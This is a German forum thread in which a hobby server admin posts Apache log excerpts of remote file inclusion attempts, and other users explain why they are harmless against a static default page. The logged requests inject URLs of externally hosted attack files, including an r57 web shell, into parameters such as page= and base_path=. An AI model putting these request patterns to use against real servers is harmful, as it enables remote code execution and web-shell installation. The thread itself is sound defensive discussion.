Wiedermal ein log...

O

Ogad

New Member
Nabend!

Heute erwartete mich in den Logs sehnsüchtig folgendes:
89.180.29.212 - - [18/Aug/2008:05:40:34 +0000] "POST http://89.110.157.158/admin/busines...sdir=http://theorchardtavern.com/menu/templat
e/view/Devils/tOtti.txt? HTTP/1.0" 404 310 "http://89.110.157.158/admin/business_inc/saveserver.php?thisdir=http://theorchardtavern.com/menu/template/view/De
vils/tOtti.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.180.29.212 - - [18/Aug/2008:05:40:34 +0000] "POST http://89.110.157.158//?page=http://theorchardtavern.com/menu/template/view/Devils/tOtti.txt? HTTP/1.0"
404 278 "http://89.110.157.158//?page=http://theorchardtavern.com/menu/template/view/Devils/tOtti.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.180.29.212 - - [18/Aug/2008:05:40:35 +0000] "POST http://89.110.157.158//poll/admin/c...http://theorchardtavern.com/menu/template/vie
w/Devils/tOtti.txt? HTTP/1.0" 404 303 "http://89.110.157.158//poll/admin/common.inc.php?base_path=http://theorchardtavern.com/menu/template/view/Devils/tOtti
.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Click to expand...
und
89.180.138.50 - - [18/Aug/2008:16:21:23 +0000] "POST http://89.110.157.158/?page=http://www.r57.li/r57.txt? HTTP/1.0" 302 333 "http://89.110.157.158/?page=ht
tp://www.r57.li/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.180.138.50 - - [18/Aug/2008:16:21:23 +0000] "POST http://89.110.157.158/admin/business_inc/saveserver.php?thisdir=http://www.r57.li/r57.txt? HTTP/1.0" 404
310 "http://89.110.157.158/admin/business_inc/saveserver.php?thisdir=http://www.r57.li/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
89.180.138.50 - - [18/Aug/2008:16:21:23 +0000] "POST http://89.110.157.158/poll/admin/common.inc.php?base_path=http://www.r57.li/r57.txt? HTTP/1.0" 404 302 "
http://89.110.157.158/poll/admin/common.inc.php?base_path=http://www.r57.li/r57.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Click to expand...

Da ich die Logs nurnoch "durchscrolle", und nur auf solche Blöcke genauer eingehe, viel mir das sofort auf. Könnte mir das jemand vielleicht "entwirren", d.h was war das nun wieder?
 
Last edited by a moderator:
Jetzt plötzlich folgendes gefunden, 2xx Code :eek:

198.247.172.9 - - [19/Aug/2008:01:36:55 +0000] "GET /apache2-default/?page=http:/theorchardtavern.com/menu/template/view/Devils/tOtti.txt? HTTP/1.1" 200 44 "
-" "Mozilla/5.0 (en-US)"
Click to expand...
217.6.19.100 - - [20/Aug/2008:09:35:44 +0000] "GET /apache2-default/?page=http://www.r57.li/r57.txt? HTTP/1.0" 200 44 "-" "Mozilla/5.0 (Windows; U; Windows N
T 5.1; de; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
Click to expand...

Davon sind tausende in meinen Logs, manche 3xx Errors, viele aber auch 2xx...
Diese dubiose .li Seite hab ich mir mal angesehen, scheind eine Shellsammlung zu sein, und diese .txt datei enthält das Apache typische "It works!"...

Anscheinend hat das Bot dieses Topic gefunden, die URL von diesem thread gibts auch in meinen Logs xD

Habe ich jetzt einen Grund mir sorgen zu machen? Was ist passiert, vor allem, was bewirkt das /apache2-default/?page=irgendwas =
 
Last edited by a moderator:
Ogad said:
und diese .txt datei enthält das Apache typische "It works!"...
Click to expand...
Das "it works" steht in apache2-default/index.html und das ist eine statische Datei bei der es egal ist mit welchen Parametern sie aufgerufen wird. Ein http://www.serversupportforum.de/?hackangriff=http://hackerseite.invalid/script ist z.b. auch komplett harmlos solange kein Script auf die (sehr dämliche) Idee kommt die angegebene Datei runterzuladen und ohne Grund auszuführen.
Anscheinend hat das Bot dieses Topic gefunden, die URL von diesem thread gibts auch in meinen Logs xD
Click to expand...
Vermutlich hat jemand oben auf die Links in deinen Logs geklickt. Also kein Bot sondern ein gelanweilter Leser :rolleyes:
Habe ich jetzt einen Grund mir sorgen zu machen?
Click to expand...
Ja. Vielleicht motiviert dich das dann ein bischen Dokumentation zu lesen. Aber gefährlich ist nur deine Unwissenheit und nicht die obigen Aufrufe.
 
Danke erstmal für die Antworten!
Auch komplett harmlos solange kein Script auf die (sehr dämliche) Idee kommt die angegebene Datei runterzuladen und ohne Grund auszuführen.
Click to expand...
PHP ist nicht installiert, und ein .sh Sollte schwierig werden :)

Aber gefährlich ist nur deine Unwissenheit und nicht die obigen Aufrufe.
Click to expand...
Wenn ich am Wochenende Zeit hab, schau ich mir die Doku mal an, aber mal Hand aufs Herz: Wer von den Hobbyadmins hat schon die gesamte Apachedoku von Seite 1 bis ... gelesen? (Ok, ich nicht :D )

Guten Morgen,
Ogad :D
 
Naja, es geht ja ned um die komplette Doku ;-)

Aber so die wichtigsten Dinger sollte man schon wissen. Es haben ja alle mal klein angefangen. Aber so Sachen wie 4xx/3xx Fehler sollten schon klar sein. Auch dass html-Dateien nicht wirklich verletzbar sind ;-)
 
Aber so Sachen wie 4xx/3xx Fehler sollten schon klar sein.
Click to expand...
Nicht sollten, sie sind mir klar. Den zweiten Logauszug habe ich ja gepostet, weil 2xx (=bestätigt & ausgeführt) drin waren...

Auch dass html-Dateien nicht wirklich verletzbar sind
Click to expand...
Mir kam nur der Parameter komisch vor :)

OT:
Naja, es geht ja ned um die komplette Doku ;-)
Click to expand...
Harry Potter habe ich auch nicht ganz gelesen, das wurde mir einfach zu doof & langweilig :)

Grüße,
Ogad
 
You must log in or register to reply here.
Back
Top